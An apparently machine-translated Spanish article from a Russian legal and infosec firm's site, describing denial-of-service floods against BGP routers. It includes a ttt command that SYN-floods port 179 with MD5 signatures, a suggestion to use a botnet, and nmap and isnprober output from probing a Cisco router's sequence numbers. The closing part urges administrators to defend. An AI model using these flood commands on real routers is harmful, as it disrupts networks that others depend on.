Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

Ataques dos "ciegos" a enrutadores BGP.

Обновлено 29.09.2025 12:18

Llamaremos ciegos a aquellos ataques que no requieren ningún conocimiento adicional, excepto la dirección IP del enrutador BGP. El escenario Más simple de tal ataque dos es SYN flood en el puerto TCP 179. Para implementar un ataque de este tipo en un enrutador industrial, es necesario usar varias docenas de computadoras, y mejor una red de bots.

Una forma más interesante de" inundar " un enrutador BGP de destino que usa autenticación MD5 es usar paquetes TCP SYN con firmas MD5. Este ataque le permite agregar carga computacional al procesamiento de MD5 del enrutador atacado.

Este ataque no es difícil de realizar con la ayuda de la utilidad ttt con la opción md5. Para optimizar la inundación, se deben ejecutar varias instancias de ttt en varias docenas de máquinas.

Aquí hay un ejemplo de uso de la utilidad ttt:

arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5

allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y

179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191

Hablando de equipos fabricados por Cisco Systems, se debe mencionar la posibilidad de implementar ataques de desbordamiento TCP/IP en la pila IOS. Para identificar estas vulnerabilidades, puede utilizar escáneres de vulnerabilidades como Nmap, hping2 e isnprober.

Aquí hay un ejemplo para un enrutador Cisco 2600:

kali# nmap -sS -O -vvvv 192.168.66.215

<skip>

TCP Sequence Prediction: class="truly" random

Difficulty=9999999 (Good luck!)

TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C

<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215

-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --

Using eth0:192.168.77.5

Probing host: 192.168.66.215 on TCP port 23.

Host:port ISN Delta

192.168.66.202:23 -1154503313

192.168.66.202:23 -24125463 1130377850

192.168.66.202:23 2031059534 2055184997

192.168.66.202:23 965205234 -1065854300

192.168.66.202:23 -1974685094 -2939890328

192.168.66.202:23 1760147902 3734832996

192.168.66.202:23 2089287258 329139356

192.168.66.202:23 -923724721 -3013011979

192.168.66.202:23 -934490140 -10765419

192.168.66.202:23 -1262713275 -328223135

En general, el protocolo de enrutamiento BGP versión 4 es una parte integral de la Internet moderna y, en consecuencia, los problemas en el funcionamiento de este protocolo seguramente afectarán el funcionamiento de la red de área amplia. Por lo tanto, si la responsabilidad del administrador del sistema incluye el mantenimiento de los enrutadores que trabajan con BGP (por lo general, estas son compañías de proveedores), entonces es necesario tomar en serio las posibles amenazas y tomar medidas para protegerlas con anticipación.

Oleg Petukhov, abogado en el campo del derecho internacional y la protección de datos personales, especialista en información seguridad, protección de la información y datos personales.

Canal de Telegram: https://t.me/protecciondelainformacion1

Grupo de Telegramas: https://t.me/protecciondelainformacion2

Sitio web: https://legascom.ru

Correo electrónico: online@legascom.ru

#proteccióndelainformación #seguridaddelainformación